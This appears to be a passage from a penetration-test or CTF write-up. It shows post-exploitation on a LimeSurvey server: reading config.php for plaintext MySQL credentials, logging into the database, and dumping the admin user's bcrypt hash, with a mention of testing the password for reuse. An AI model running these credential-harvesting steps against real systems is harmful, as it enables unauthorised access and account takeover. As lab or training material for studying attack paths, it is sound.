MySQL
Checking for DB credentials after performing a manual system enumeration
$ cat /var/www/LimeSurvey/application/config/config.php
<?php if (!defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| 'connectionString' Hostname, database, port and database type for
| the connection. Driver example: mysql. Currently supported:
| mysql, pgsql, mssql, sqlite, oci
| 'username' The username used to connect to the database
| 'password' The password used to connect to the database
| 'tablePrefix' You can add an optional prefix, which will be added
| to the table name when using the Active Record class
|
*/
return array(
'components' => array(
'db' => array(
'connectionString' => 'mysql:host=localhost;port=3306;dbname=limesurvey;',
'emulatePrepare' => true,
'username' => 'limesurvey_user',
'password' => 'EzPwz2022_dev1$$23!!',
'charset' => 'utf8mb4',
'tablePrefix' => 'lime_',
),
'session' => array (
'sessionName'=>'LS-EYFVWDSAKOIAECZM',
// Uncomment the following lines if you need table-based sessions.
// Note: Table-based sessions are currently not supported on MSSQL server.
// 'class' => 'application.core.web.DbHttpSession',
// 'connectionID' => 'db',
// 'sessionTableName' => '{{sessions}}',
),
'urlManager' => array(
'urlFormat' => 'path',
'rules' => array(
// You can add your own rules here
),
'showScriptName' => true,
),
),
// For security issue : it's better to set runtimePath out of web access
// Directory must be readable and writable by the webuser
// 'runtimePath'=>'/var/limesurvey/runtime/'
// Use the following config variable to set modified optional settings copied from config-defaults.php
'config'=>array(
// debug: Set this to 1 if you are looking for errors. If you still get no errors after enabling this
// then please check your error-logs - either in your hosting provider admin panel or in some /logs directory
// on your webspace.
// LimeSurvey developers: Set this to 2 to additionally display STRICT PHP error messages and get full access to standard templates
'debug'=>0,
'debugsql'=>0, // Set this to 1 to enanble sql logging, only active when debug = 2
// Mysql database engine (INNODB|MYISAM):
'mysqlEngine' => 'MYISAM'
, // Update default LimeSurvey config here
)
);
/* End of file config.php */
/* Location: ./application/config/config.php */DB credential identified; limesurvey_user:EzPwz2022_dev1$$23!!
I will also test the password for password reuse
Session
www-data@marketing:/var/www/LimeSurvey/application/config$ mysql -ulimesurvey_user -p
Enter password: EzPwz2022_dev1$$23!!
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 81
Server version: 8.0.29-0ubuntu0.20.04.3 (Ubuntu)
Copyright (c) 2000, 2022, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> use limesurvey
use limesurvey
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changedSession established
mysql> select users_name,password from lime_users;
select users_name,password from lime_users;
+------------+--------------------------------------------------------------+
| users_name | password |
+------------+--------------------------------------------------------------+
| admin | $2y$10$QxdVgZGY9odLkWsUYF7dNOkI.STdeEWnUiUse/9rkI.lg7T3QI5UG |
+------------+--------------------------------------------------------------+
1 row in set (0.00 sec)This is the admin user’s credential hash, but it’s already known; password
N/A